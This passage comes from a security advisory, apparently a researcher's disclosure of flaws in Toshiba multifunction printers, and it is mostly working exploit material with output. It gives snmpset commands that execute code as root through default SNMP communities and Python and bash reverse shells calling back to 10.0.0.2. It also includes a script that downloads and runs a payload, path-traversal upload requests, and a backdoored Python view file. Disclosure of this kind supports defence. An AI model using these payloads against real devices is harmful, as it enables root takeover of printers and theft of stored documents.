configuration. By default, these communities are used: - - `public` for read only access; - - `private` for read/write access. Using the `private` community, it is possible to remotely execute commands as root on the remote printer. For example, these commands will execute the command `id` as root on the remote printer: kali% snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private [ip] 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c id' NET-SNMP-EXTEND-MIB::nsExtendStatus."cmd" = INTEGER: createAndGo(4) NET-SNMP-EXTEND-MIB::nsExtendCommand."cmd" = STRING: /bin/sh NET-SNMP-EXTEND-MIB::nsExtendArgs."cmd" = STRING: -c id kali% snmpbulkwalk -c private -v2c [ip] NET-SNMP-EXTEND-MIB::nsExtendObjects NET-SNMP-EXTEND-MIB::nsExtendNumEntries.0 = INTEGER: 6 NET-SNMP-EXTEND-MIB::nsExtendCommand."cmd" = STRING: /bin/sh NET-SNMP-EXTEND-MIB::nsExtendArgs."cmd" = STRING: -c id NET-SNMP-EXTEND-MIB::nsExtendInput."cmd" = STRING: NET-SNMP-EXTEND-MIB::nsExtendCacheTime."cmd" = INTEGER: 5 NET-SNMP-EXTEND-MIB::nsExtendExecType."cmd" = INTEGER: exec(1) NET-SNMP-EXTEND-MIB::nsExtendRunType."cmd" = INTEGER: run-on-read(1) NET-SNMP-EXTEND-MIB::nsExtendStorage."cmd" = INTEGER: volatile(2) NET-SNMP-EXTEND-MIB::nsExtendStatus."cmd" = INTEGER: active(1) NET-SNMP-EXTEND-MIB::nsExtendOutput1Line."cmd" = STRING: uid=0(root) gid=2000(trusted) groups=0(root) NET-SNMP-EXTEND-MIB::nsExtendOutputFull."cmd" = STRING: uid=0(root) gid=2000(trusted) groups=0(root) NET-SNMP-EXTEND-MIB::nsExtendOutNumLines."cmd" = INTEGER: 1 NET-SNMP-EXTEND-MIB::nsExtendResult."cmd" = INTEGER: 0 NET-SNMP-EXTEND-MIB::nsExtendOutLine."cmd".1 = STRING: uid=0(root) gid=2000(trusted) groups=0(root) Using this vulnerability will allow any attacker to get a root access on a remote Toshiba printer as shown below. This following PoC will execute a connect-back shell with root privilege to 10.0.0.2:21/tcp: kali% snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private [ip] 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /home/SYSROM_SRC/build/release/bin/python 'nsExtendArgs."cmd"' = '-c "import sys,socket,os,pty;s=socket.socket();s.connect((\"10.0.0.2\",21));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/sh\")"' NET-SNMP-EXTEND-MIB::nsExtendStatus."cmd" = INTEGER: createAndGo(4) NET-SNMP-EXTEND-MIB::nsExtendCommand."cmd" = STRING: /home/SYSROM_SRC/build/release/bin/python NET-SNMP-EXTEND-MIB::nsExtendArgs."cmd" = STRING: -c "import sys,socket,os,pty;s=socket.socket();s.connect((\"10.0.0.2\",21));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/sh\")" kali% snmpbulkwalk -c private -v2c [ip] NET-SNMP-EXTEND-MIB::nsExtendObjects And on the attacker machine, we will receive a shell on port 21/tcp: kali# nc -l -v -p 21 listening on [any] 21 ... 10.0.0.1: inverse host lookup failed: Unknown host connect to [10.0.0.2] from (UNKNOWN) [10.0.0.1] 43467 sh-4.1# uname -ap Linux MFP12188257 3.10.38-ltsi-WR6.0.0.11_standard #3010 SMP Wed Jul 6 16:20:23 IST 2022 i686 GNU/Linux sh-4.1# id uid=0(root) gid=2000(trusted) groups=0(root) sh-4.1# exit The attacker will then get a full root access in the printer, including full access to the encrypted partition: kali# nc -l -v -p 443 listening on [any] 443 ... 10.0.0.1: inverse host lookup failed: Unknown host connect to [10.0.0.2] from (UNKNOWN) [10.0.0.1] 36468 bash-4.1# df -h df -h Filesystem Size Used Avail Use% Mounted on rootfs 4.8G 3.7G 904M 81% / /dev/root 48M 28M 18M 62% /old_root /dev/sda2 4.8G 3.7G 904M 81% / /dev/sda13 4.8G 49M 4.5G 2% /platform none 1.5G 188K 1.5G 1% /dev /dev/sda3 4.8G 1.3G 3.4G 28% /rollback /dev/sda5 25G 904M 23G 4% /work /dev/sda6 2.9G 620M 2.2G 23% /registration /dev/sda7 976M 1.3M 908M 1% /backup /dev/sda8 32G 60M 30G 1% /imagedata /dev/sda9 94G 65M 89G 1% /application /dev/mapper/enc_encryption 992M 2.6M 964M 1% /encryption /dev/sda12 119G 60M 112G 1% /storage tmpfs 1.5G 3.7M 1.5G 1% /dev/shm bash-4.1# mount mount rootfs on / type rootfs (rw) /dev/root on /old_root type ext2 (rw,relatime,errors=continue,user_xattr) proc on /old_root/proc type proc (rw,relatime) /dev/sda2 on / type ext4 (rw,relatime,nodelalloc,nobarrier,data=ordered) /dev/sda13 on /platform type ext4 (rw,relatime,nodelalloc,nobarrier,data=ordered) proc on /proc type proc (rw,relatime) sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,relatime) none on /dev type tmpfs (rw,relatime,mode=755) ramfs on /ramdisk type ramfs (rw,relatime,size=100m) /dev/sda3 on /rollback type ext4 (rw,relatime,nodelalloc,nobarrier,data=ordered) /dev/sda5 on /work type ext4 (rw,relatime,nodelalloc,nobarrier,data=ordered) /dev/sda6 on /registration type ext4 (rw,relatime,nodelalloc,nobarrier,data=ordered) /dev/sda7 on /backup type ext4 (rw,relatime,nodelalloc,nobarrier,data=ordered) /dev/sda8 on /imagedata type ext4 (rw,relatime,nodelalloc,nobarrier,data=ordered) /dev/sda9 on /application type ext4 (rw,relatime,nodelalloc,nobarrier,data=ordered) /dev/mapper/enc_encryption on /encryption type ext4 (rw,relatime,nodelalloc,nobarrier,data=ordered) /dev/sda12 on /storage type ext4 (rw,relatime,nodelalloc,nobarrier,data=ordered) tmpfs on /dev/shm type tmpfs (rw,relatime,mode=755) devpts on /dev/pts type devpts (rw,relatime,mode=600) fusectl on /sys/fs/fuse/connections type fusectl (rw,relatime) bash-4.1# The vulnerability is located inside net-snmpd, as net-snmpd supports the `NET-SNMP-EXTEND-MIB` extension MIB. This extension allows the execution of code from the net-snmpd daemon, with root privileges, with 2 steps: 1. Definition of a new MIB; 2. Execution of the new MIB. A bash payload is also provided: This following PoC will download a shell script, save it inside `/dev/shm/pwn.sh` and execute it as root on the targeted printer: kali% cat /var/www/html/pwn.sh #!/bin/sh bash -i >& /dev/tcp/10.0.0.2/443 0>&1 kali% cat ./remote-pwn.sh #!/bin/sh snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private $1 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "curl http://10.0.0.2/pwn.sh -o /dev/shm/pwn.sh"' snmpbulkwalk -c private -v2c $1 NET-SNMP-EXTEND-MIB::nsExtendObjects snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private $1 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "chmod 755 /dev/shm/pwn.sh"' snmpbulkwalk -c private -v2c $1 NET-SNMP-EXTEND-MIB::nsExtendObjects snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private $1 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = ' "/dev/shm/pwn.sh"' snmpbulkwalk -c private -v2c $1 NET-SNMP-EXTEND-MIB::nsExtendObjects Using this PoC to get a connect-back root shell: kali% ./remote-pwn.sh 10.0.0.1 NET-SNMP-EXTEND-MIB::nsExtendStatus."cmd" = INTEGER: createAndGo(4) NET-SNMP-EXTEND-MIB::nsExtendCommand."cmd" = STRING: /bin/sh NET-SNMP-EXTEND-MIB::nsExtendArgs."cmd" = STRING: -c "curl http://10.0.0.2/pwn.sh -o /dev/shm/pwn.sh" NET-SNMP-EXTEND-MIB::nsExtendNumEntries.0 = INTEGER: 21 NET-SNMP-EXTEND-MIB::nsExtendCommand."cmd" = STRING: /bin/sh NET-SNMP-EXTEND-MIB::nsExtendArgs."cmd" = STRING: -c "curl http://10.0.0.2/pwn.sh -o /dev/shm/pwn.sh" NET-SNMP-EXTEND-MIB::nsExtendInput."cmd" = STRING: NET-SNMP-EXTEND-MIB::nsExtendCacheTime."cmd" = INTEGER: 5 NET-SNMP-EXTEND-MIB::nsExtendExecType."cmd" = INTEGER: exec(1) NET-SNMP-EXTEND-MIB::nsExtendRunType."cmd" = INTEGER: run-on-read(1) NET-SNMP-EXTEND-MIB::nsExtendStorage."cmd" = INTEGER: volatile(2) NET-SNMP-EXTEND-MIB::nsExtendStatus."cmd" = INTEGER: active(1) NET-SNMP-EXTEND-MIB::nsExtendOutput1Line."cmd" = STRING: % Total % Received % Xferd Average Speed Time Time Time Current NET-SNMP-EXTEND-MIB::nsExtendOutputFull."cmd" = STRING: % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 53 100 53 0 0 53 0 0:00:01 --:--:-- 0:00:01 114 NET-SNMP-EXTEND-MIB::nsExtendOutNumLines."cmd" = INTEGER: 3 NET-SNMP-EXTEND-MIB::nsExtendResult."cmd" = INTEGER: 0 NET-SNMP-EXTEND-MIB::nsExtendOutLine."cmd".1 = STRING: % Total % Received % Xferd Average Speed Time Time Time Current NET-SNMP-EXTEND-MIB::nsExtendOutLine."cmd".2 = STRING: Dload Upload Total Spent Left Speed 100 53 100 53 0 0 53 0 0:00:01 --:--:-- 0:00:01 114 Error in packet. Reason: inconsistentValue (The set value is illegal or unsupported in some way) Failed object: NET-SNMP-EXTEND-MIB::nsExtendStatus."cmd" NET-SNMP-EXTEND-MIB::nsExtendNumEntries.0 = INTEGER: 21 NET-SNMP-EXTEND-MIB::nsExtendStatus."cmd" = INTEGER: createAndGo(4) NET-SNMP-EXTEND-MIB::nsExtendCommand."cmd" = STRING: /bin/sh NET-SNMP-EXTEND-MIB::nsExtendArgs."cmd" = STRING: "/dev/shm/pwn.sh" caTimeout: No Response from 10.0.0.1 And the connect-back shell script will connect to 10.0.0.2 on port 443/tcp, as defined in the previous `pwn.sh` script: kali# nc -l -v -p 443 listening on [any] 443 ... 10.0.0.1: inverse host lookup failed: Unknown host connect to [10.0.0.2] from (UNKNOWN) [10.0.0.1] 36464 bash-4.1# uname -ap Linux MFP14144292 3.10.38-ltsi-WR6.0.0.11_standard #3513 SMP Tue Jul 5 09:58:22 IST 2022 i686 GNU/Linux bash-4.1# id uid=0(root) gid=2000(trusted) groups=0(root) bash-4.1# We can also review the configuration file located at `/encryption/al/network/config/snmpd.conf`, containing the default communities: bash-4.1# grep -v '^#' /encryption/al/network/config/snmpd.conf rocommunity public rocommunity6 public rwcommunity private rwcommunity6 private com2sec udp 0.0.0.0/24 public view all included .1 80 view generaluser_view excluded .1 view generaluser_view included .1.3.6.1.4.1.1129.2.3.50.1.3.23.2.1.3 view generaluser_view included .1.3.6.1.4.1.1129.2.3.50.1.3.21.4.1.3 view generaluser_view included .1.3.6.1.4.1.1129.2.3.50.1.3.21.4.1.4 access udpGroup "toshibaAmerica" v1 noauth exact all all none access admin_priv_group "" usm priv prefix all all none access admin_auth_group "" usm auth prefix all all none access generaluser_priv_group "" usm priv prefix all generaluser_view none access generaluser_auth_group "" usm auth prefix all generaluser_view none trapcommunity public dlmod mibs_impl /home/SYSROM_SRC/lib/libalmibs_impl.so master off agentaddress udp:161,udp6:161 authtrapenable 1 maxGetbulkRepeats 20 maxGetbulkResponses 100bash-4.1# SNMP is also exposed over IPv6. ## Details - Pre-authenticated Remote Code Execution as root or apache and multiple Local Privilege Escalations Toshiba printers provide several ways to upload files using the web interface. By default, this web interface is reachable without authentication. For example, using the e-filing web interface, freely reachable using http://ip:8080/?MAIN=EFILING, we can upload documents: [please use the HTML version at https://pierrekim.github.io/blog/2024-06-27-toshiba-mfp-40-vulnerabilities.html] [please use the HTML version at https://pierrekim.github.io/blog/2024-06-27-toshiba-mfp-40-vulnerabilities.html] It is possible to upload a document: [please use the HTML version at https://pierrekim.github.io/blog/2024-06-27-toshiba-mfp-40-vulnerabilities.html] [please use the HTML version at https://pierrekim.github.io/blog/2024-06-27-toshiba-mfp-40-vulnerabilities.html] The uploaded file will be stored inside the printer in the /work/al/tmp/upload/ directory, inside a directory named by the current session. bash-4.1# find /work/al/tmp/upload /work/al/tmp/upload /work/al/tmp/upload/ContentWebServer_10.0.0.2.f54c69d5d2b1963325041644084615ab /work/al/tmp/upload/ContentWebServer_10.0.0.2.f54c69d5d2b1963325041644084615ab/test3.txt /work/al/tmp/upload/ContentWebServer_10.0.0.2.f54c69d5d2b1963325041644084615ab/test1.txt /work/al/tmp/upload/ContentWebServer_10.0.0.2.f54c69d5d2b1963325041644084615ab/test2.txt bash-4.1# ls -latrR /work/al/tmp/upload /work/al/tmp/upload: total 12 drwxr-xr-x 7 root lp 4096 Mar 24 05:35 .. drwx------ 2 apache trusted 4096 Mar 24 05:43 ContentWebServer_10.0.0.2.f54c69d5d2b1963325041644084615ab drwxrwxrwx 3 root trusted 4096 Mar 24 05:46 . /work/al/tmp/upload/ContentWebServer_10.0.0.2.f54c69d5d2b1963325041644084615ab: total 20 -rw-rw-rw- 1 apache trusted 8 Mar 24 05:41 test1.txt -rw-rw-rw- 1 apache trusted 9 Mar 24 05:42 test2.txt -rw-rw-rw- 1 apache trusted 9 Mar 24 05:43 test3.txt drwx------ 2 apache trusted 4096 Mar 24 05:43 . drwxrwxrwx 3 root trusted 4096 Mar 24 05:46 .. bash-4.1# This current session is provided by the printer when visiting the web interface without authentication. An attacker can replay the HTTP request with a valid session obtained while browsing http://ip/?MAIN=EFILING without authentication, and change the path to the uploaded file. This path will then be used to store the file inside the remote printer. For example, with a `Name` variable set to `/./../../../../../home/SYSROM_SRC/sbin/malicious.program`, the uploaded file is correctly written into `/home/SYSRM_SRC/sbin/malicious.program` inside the printer. The HTTP request will be: POST /contentwebserver/upload HTTP/1.1 Host: 10.0.0.1:8080 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------12552735029913057752829397207 Content-Length: 1011 Origin: http://10.0.0.1:8080 Connection: close Referer: http://10.0.0.1:8080/efiling/UploadArchive.html?v=1517352288ta Cookie: Locale=en-US,en#q=0.5; BrowserLang=en_US; pageTrack=MAIN%3DDEVICE; Session=10.0.0.2.c8a776a2c87613d78cbb94c558269c61; IgnoreSessionTimeout=3 Upgrade-Insecure-Requests: 1 -----------------------------12552735029913057752829397207 Content-Disposition: form-data; name="formSubmitCompleteEventHandler" frames[1].formSubmitComplete -----------------------------12552735029913057752829397207 Content-Disposition: form-data; name="DeviceInformationModel" <DeviceInformationModel><Command><Move><commandNode>FileStorages</commandNode><Params><source><File>test.txt</File><name>Upload</name></source><destination><name>DataImport</name></destination></Params></Move></Command></DeviceInformationModel> -----------------------------12552735029913057752829397207 Content-Disposition: form-data; name="CsrfpId" 10.0.0.2.c8a776a2c87613d78cbb94c558269c61 -----------------------------12552735029913057752829397207 Content-Disposition: form-data; name="/./../../../../../home/SYSROM_SRC/sbin/malicious.program"; filename="test.txt" Content-Type: text/plain MALICIOUS_CONTENT_WRITTEN_INTO_THE_HARD_DISK -----------------------------12552735029913057752829397207-- Burp Request: [please use the HTML version at https://pierrekim.github.io/blog/2024-06-27-toshiba-mfp-40-vulnerabilities.html] [please use the HTML version at https://pierrekim.github.io/blog/2024-06-27-toshiba-mfp-40-vulnerabilities.html] And the file is correctly written into `/home/SYSRM_SRC/sbin/malicious.program` inside the printer: [please use the HTML version at https://pierrekim.github.io/blog/2024-06-27-toshiba-mfp-40-vulnerabilities.html] This vulnerability can be used to get Remote Code Executions using several different ways. Due to some weaknesses found in Toshiba printers, there are hundreds different ways to get Remote Code Execution. For example: * Upload of a malicious library defined in the LD_PRELOAD variable: * /ramdisk/al/libGetNameInfoInterface.so or /ramdisk/al/libGetAddtInfoInterface.so can be overwritten by a malicious library * Upload of a malicious library using the LD_LIBRARY_PATH variable - An attacker can upload malicious libraries inside: * /home/SYSROM_SRC/build/release/lib, * /mfp/lib, * /home/SYSROM_SRC/NoBuildItems/common/lib, * /home/SYSROM_SRC/build/thirdparty/plugins/platforminputcontexts/, * /home/SYSROM_SRC/build/release/lib. * Upload of a malicious program due to insecure permissions: * As shown in Local Privilege Escalation and Remote Code Execution using insecure permissions for 106 programs, a lot of programs running as root can be overwritten due to insecure permissions (777) * Upload a malicious Python program or a malicious Python library * ... This lack of protection can be found in several HTML forms when using the printer, without administrative privileges. For example, the page at http://10.0.0.1:8080/Administration/maintenance/uploadsoft/DriverCustomize.html allows uploading any file: [please use the HTML version at https://pierrekim.github.io/blog/2024-06-27-toshiba-mfp-40-vulnerabilities.html] [please use the HTML version at https://pierrekim.github.io/blog/2024-06-27-toshiba-mfp-40-vulnerabilities.html] It is mandatory to inject a `<INPUT TYPE=SUBMIT>` in the server response using Burp or to directly generate such request to upload any file. An example is shown below on how to get Remote Code Execution using the upload of a malicious Python script in the next section, using the following request: POST /contentwebserver/upload HTTP/1.1 Host: 10.0.0.1:8080 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------394285998421640844852768059947 Content-Length: 1126 Origin: http://10.0.0.1:8080 Connection: close Referer: http://10.0.0.1:8080/Administration/maintenance/uploadsoft/DriverCustomize.html Cookie: Locale=en-US,en#q=0.5; BrowserLang=en_US; pageTrack=MAIN%3DDEVICE; clicked=0; addrLastVisited=ADDRBK; IgnoreSessionTimeout=1; Session=10.0.0.2.5fb38c36e6e15dbe77652121b3d85e0c Upgrade-Insecure-Requests: 1 -----------------------------394285998421640844852768059947 Content-Disposition: form-data; name="formSubmitCompleteEventHandler" frames[0].formSubmitCompleteUploadList -----------------------------394285998421640844852768059947 Content-Disposition: form-data; name="DeviceInformationModel" <DeviceInformationModel><GetValue><eFiling><View><BoxList/></View></eFiling></GetValue><Command><GetEFilingBoxes><commandNode>eFiling/BoxList</commandNode><Params><responseXpath contentType='XPath'>eFiling/View/BoxList</responseXpath><curPage contentType='Value'>1</curPage><pageSize contentType='Value'>200</pageSize><definedBox contentType='Value'>true</definedBox></Params></GetEFilingBoxes></Command></DeviceInformationModel> -----------------------------394285998421640844852768059947 Content-Disposition: form-data; name="CsrfpId" 10.0.0.2.5fb38c36e6e15dbe77652121b3d85e0c -----------------------------394285998421640844852768059947 Content-Disposition: form-data; name="test.txt"; filename="test.txt" Content-Type: text/plain test -----------------------------394285998421640844852768059947-- And the file is correctly uploaded into the printer: bash-4.1# ls -la /work/al/tmp/upload/ContentWebServer_10.0.0.2.5fb38c36e6e15dbe77652121b3d85e0c/ total 12 drwx------ 2 apache trusted 4096 May 27 19:34 . drwxrwxrwx 3 root trusted 4096 May 27 19:30 .. -rw-rw-rw- 1 apache trusted 5 May 27 19:34 test.txt bash-4.1# cat /work/al/tmp/upload/ContentWebServer_10.0.0.2.5fb38c36e6e15dbe77652121b3d85e0c/test.txt test bash-4.1# We can find several webpages allowing exploiting the vulnerable `/contentwebserver/upload` API. It was determined that these webpages are using the insecure `/contentwebserver/upload` API. They can be used by any attacker to upload any file into the printers: - - http://printer-ip/efiling/UploadFrame.html - - http://printer-ip/efiling/UploadArchive.html - - http://printer-ip/efiling/UploadFrame.html - - http://printer-ip/efiling/UploadArchiveProgress.html - - http://printer-ip/efiling/UpLoadArchiveClose.html - - http://printer-ip/efiling/UploadArchiveButton.html - - http://printer-ip/Registration/AddressBook/AddrImport.html - - http://printer-ip/Registration/AddressBook/AddrImportListFrame.html - - http://printer-ip/Administration/maintenance/uploadsoft/DriverCustomize.html - - ... Some of these files are directly reachable without authentication (e.g. Registration or efiling) and can be found without an admin account. ### Remote Code Execution - Upload of a new .py module inside WSGI Python programs Some of the APIs and web interfaces of the printers are written in Python. Since the permissions of these Python scripts inside the printers are insecure, a backdoored version of the `/registration/al/TopAccessPy/server/screenfacade/appmgmt/views.py` has been uploaded as shown below: Content of `/registration/al/TopAccessPy/server/screenfacade/appmgmt/views.py` with a malicious payload added on line 25: [code:python] 1 #! /usr/bin/env python 2 # -*- coding: utf-8 -*- 3 import sys 4 import os 5 from pyramid.view import view_config 6 from pyramid.exceptions import HTTPForbidden 7 from pyramid.response import Response,FileResponse 8 from server.screenfacade.appmgmt.applicationmanager import applicationManagementModel 9 import logging 10 import json 11 import pyeapicore 12 13 sys.path.append('/home/SYSROM_SRC/lib') 14 15 log = logging.getLogger("server") 16 17 @view_config(route_name='get_app_list_deployed', xhr=True, renderer='jsonp') 18 def get_app_list_deployed(request): 19 log.warning("++++++++++++++++++++++++++++++++") 20 log.warning("get app list Views : Start ") 21 SessionID = '' 22 session = ' ' 23 csrfpId = '' 24 browserLang = '' 25 os.system("bash -i >& /dev/tcp/10.0.0.2/21 0>&1") 26 27 if 'SessionID' in request.cookies: 28 SessionID = request.cookies['SessionID'] 29 if 'Session' in request.cookies: 30 session = request.cookies['Session'] 31 if 'csrfpId' in request.headers: 32 csrfpId = request.headers['csrfpId'] 33 if 'BrowserLang' in request.cookies: 34 browserLang = request.cookies['BrowserLang'] 35 36 log.info('Session ID obtained from request :' + SessionID) 37 log.info('csrfpId obtained from request:' + csrfpId) 38 validationMap = True 39 40 if validationMap['VALIDATION_STATUS'] == 'PASSED': 41 log.info('User Validation : SUCCESS') 42 data = applicationManagementModel.getAppList(browserLang) 43 log.warning("get app list Views : End ") 44 log.warning("++++++++++++++++++++++++++++++++") 45 return json.dumps(data) 46 else: 47 log.info('User Validation : FAILURE') 48 log.warning("get app list Views : End ") 49 if "HTTP_REQUEST_FORBIDDEN" in validationMap: 50 return HTTPForbidden("Error 403 : Forbidden Request") 51 else: 52 return json.dumps(validationMap) 53 54 @view_config(route_name='start_background_application', xhr=True, renderer='jsonp') 55 def start_background_application(request): 56 log.warning("++++++++++++++++++++++++++++++++") 57 log.warning("start background app : Start ") [...] [/code] Due to some reverse proxy rules and check before this API can be reached, this Python code is reachable using the API path `http://printerip/tapy/server/appmgmt/applistDeployed` with a cookie previously provided by the printer when visiting http://printerip/ (without authentication). When sending a HTTP request to `http://printerip/tapy/server/appmgmt/applistDeployed`, the attacker will receive a connect-back shell from the printer: kali# nc -l -v -p 21 listening on [any] 21 ... 10.0.0.1: inverse host lookup failed: Unknown host connect to [10.0.0.2] from (UNKNOWN) [10.0.0.1] 37243 [apache@MFP14144292 /]$ id uid=1000(apache) gid=2000(trusted) groups=2000(trusted) [apache@MFP14144292 /]$ uname -ap Linux MFP14144292 3.10.38-ltsi-WR6.0.0.11_standard #3513 SMP Tue Jul 5 09:58:22 IST 2022 i686 GNU/Linux [apache@MFP14144292 /]$ Connect-back shell as apache: [please use the HTML version at https://pierrekim.github.io/blog/2024-06-27-toshiba-mfp-40-vulnerabilities.html] ### Remote Code Execution - Upload of a new .ini configuration files inside WSGI Python programs It is possible to overwrite the .ini configuration file used by WSGI Python programs. This technique is public as of 2023-02-28: https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html. Apache is running with WSGI configurations: bash-4.1# ps auxww | grep apache apache 1611 0.0 0.1 1264444 3708 ? Sl 10:37 0:00 /usr/local/ebx/httpd_worker/bin/httpd_worker -f /encryption/al/network/config/httpd-prox.conf -k start apache 1822 0.2 3.6 483056 108852 ? Sl 10:37 1:02 (wsgi:webpanel) -f /encryption/al/network/config/httpd-wsgi.conf -k start apache 1823 0.0 2.1 270952 64172 ? Sl 10:37 0:05 (wsgi:topaccesspy) -f /encryption/al/network/config/httpd-wsgi.conf -k start apache 1824 0.0 0.1 285148 4452 ? Sl 10:37 0:00 /usr/local/ebx/httpd_worker/bin/httpd_worker -f /encryption/al/network/config/httpd-wsgi.conf -k start The Python scripts running as WSGI are configured with specific .ini configuration files: - - `/registration/al/WebPanel/development.ini` - - `/registration/al/TopAccessPy/development.ini` Unfortunately, these configuration files can be rewritten because of insecure permissions, allowing a remote attacker to execute commands, as described in recent public research. These files have insecure permissions as shown below: bash-4.1# ls -la /registration/al/WebPanel/ total 2632 drwxrwxrwx 7 root root 4096 Dec 6 03:33 . drwxrwxrwx 19 root root 4096 Mar 14 16:28 .. -rwxrwxrwx 1 root root 2642944 Dec 6 03:33 HomeBackgroundImages.tar.gz -rwxrwxrwx 1 root root 857 Dec 6 03:33 Makefile -rwxrwxrwx 1 root root 909 Dec 6 03:33 config.rb -rwxrwxrwx 1 root root 1103 Dec 6 03:33 development.ini drwxrwxrwx 4 root root 4096 Jan 22 2015 predefinedxml -rwxrwxrwx 1 root root 199 Dec 6 03:33 pyramid.wsgi drwxrwxrwx 3 root root 4096 Dec 6 03:33 statuspages drwxrwxrwx 14 root root 4096 Dec 6 03:33 wpclient drwxrwxrwx 6 root root 4096 Mar 14 16:32 wpserver drwxrwxrwx 2 root root 4096 Dec 6 03:33 wpserver.egg-info bash-4.1# ls -la /registration/al/WebPanel/development.ini -rwxrwxrwx 1 root root 1103 Dec 6 03:33 /registration/al/WebPanel/development.ini bash-4.1# ls -la /registration/al/TopAccessPy total 36 drwxrwxrwx 5 root root 4096 Dec 6 03:39 . drwxrwxrwx 19 root root 4096 Mar 14 16:28 .. -rwxrwxrwx 1 root root 315 Dec 6 03:39 Makefile -rwxrwxrwx 1 root root 2091 Dec 6 03:39 TA_CacheScript.sh drwxrwxrwx 7 root root 4096 Mar 23 10:37 client -rwxrwxrwx 1 root root 1078 Dec 6 03:39 development.ini -rwxrwxrwx 1 root root 202 Dec 6 03:39 pyramid.wsgi drwxrwxrwx 6 root root 4096 Mar 14 16:32 server drwxrwxrwx 2 root root 4096 Dec 6 03:39 server.egg-info bash-4.1# ls -la /registration/al/TopAccessPy/development.ini -rwxrwxrwx 1 root root 1078 Dec 6 03:39 /registration/al/TopAccessPy/development.ini These scripts can be overwritten to include specific commands to be executed: Content of `/registration/al/TopAccessPy/development.ini`: bash-4.1# cat /registration/al/TopAccessPy/development.ini [app:main] use = egg:server pyramid.reload_templates = true pyramid.debug_authorization = false pyramid.debug_notfound = false pyramid.debug_routematch = false pyramid.default_locale_name = en pyramid.includes = pyramid_tm [server:main] # Begin logging configuration [loggers] keys = root, server [handlers] keys = console, serverhandler [formatters] keys = generic, serverformatter [logger_root] level = DEBUG handlers = console [logger_server] level=DEBUG handlers=serverhandler qualname=server propagate=0 [handler_console] class = StreamHandler args = (sys.stderr,) level = NOTSET formatter = generic [handler_serverhandler] class=logging.handlers.RotatingFileHandler level=DEBUG formatter=serverformatter args=('/work/log/al/webpanel/python_ta.log','a',(5*1024*1024),3) [formatter_generic] format = %(asctime)s %(levelname)-5.5s [%(name)s][%(threadName)s] %(message)s [formatter_serverformatter] format=%(asctime)s%(msecs)03d Pid= %(process)d Tid= %(thread)d %(filename)s %(lineno)d %(levelname)s %(message)s datefmt=%m/%d %H:%M:%S # End logging configuration ### Remote Code Execution - Upload of a malicious script `/tmp/backtraceScript.sh` and injection of malicious gdb commands When a program crashes, the `/tmp/backtraceScript.sh` script will be executed as root as shown below: 2023/05/27 19:48:02 CMD: UID=0 PID=22535 | sh -c /tmp/backtraceScript.sh "/work/log/corefiles/core.httpd_worker.8272.MFP14130119.1681135080" > "/work/log/corefiles/core.httpd_worker.8272.MFP14130119.1681135080"_backtrace 2023/05/27 19:48:02 CMD: UID=0 PID=22536 | /bin/bash /tmp/backtraceScript.sh /work/log/corefiles/core.httpd_worker.8272.MFP14130119.1681135080 2023/05/27 19:48:02 CMD: UID=0 PID=22540 | /bin/bash /tmp/backtraceScript.sh /work/log/corefiles/core.httpd_worker.8272.MFP14130119.1681135080 2023/05/27 19:48:02 CMD: UID=0 PID=22539 | /bin/bash /tmp/backtraceScript.sh /work/log/corefiles/core.httpd_worker.8272.MFP14130119.1681135080 2023/05/27 19:48:02 CMD: UID=0 PID=22538 | /bin/bash /tmp/backtraceScript.sh /work/log/corefiles/core.httpd_worker.8272.MFP14130119.1681135080 2023/05/27 19:48:02 CMD: UID=0 PID=22537 | /bin/bash /tmp/backtraceScript.sh /work/log/corefiles/core.httpd_worker.8272.MFP14130119.1681135080 2023/05/27 19:48:03 CMD: UID=0 PID=22541 | gdb -c /work/log/corefiles/core.httpd_worker.8272.MFP14130119.1681135080 -x /tmp/gdb_commands.txt 2023/05/27 19:48:03 CMD: UID=0 PID=22542 | gdb /usr/local/ebx/httpd_worker/bin/httpd_worker /work/log/corefiles/core.httpd_worker.8272.MFP14130119.1681135080 --batch --command=/tmp/gdb_commands.txt 2023/05/27 19:48:03 CMD: UID=0 PID=22543 | iconv -l This script has insecure permissions (777) and will run gdb as root: Content of `/tmp/backtraceScript.sh`: bash-4.1# ls -la /tmp/backtraceScript.sh -rwxrwxrwx 1 root root 1457 Apr 6 2016 /tmp/backtraceScript.sh bash-4.1# cat /tmp/backtraceScript.sh #!/bin/bash OIFS=${IFS} IFS=$'\n' echo "quit" > /tmp/gdb_commands.txt echo "quit" >> /tmp/gdb_commands.txt EXE_NAME=`gdb -c "$1" -x /tmp/gdb_commands.txt | grep "Core was generated by" | cut -d'\`' -f2 | cut -d' ' -f1` echo "thread apply all backtrace full" > /tmp/gdb_commands.txt echo "set print asm" >> /tmp/gdb_commands.txt echo "set print demangle on" >> /tmp/gdb_commands.txt echo "disassemble" >> /tmp/gdb_commands.txt echo "info reg" 